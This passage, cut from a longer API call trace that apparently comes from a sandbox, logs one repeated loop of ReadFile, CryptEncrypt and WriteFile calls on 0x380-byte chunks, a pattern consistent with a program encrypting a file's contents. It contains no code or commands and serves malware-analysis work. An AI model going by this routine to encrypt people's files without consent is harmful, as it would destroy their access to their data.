pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.989] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.989] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.989] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.989] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.991] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.991] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.991] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.992] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.993] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.993] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.993] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.994] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.995] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.995] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.996] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.996] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.997] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 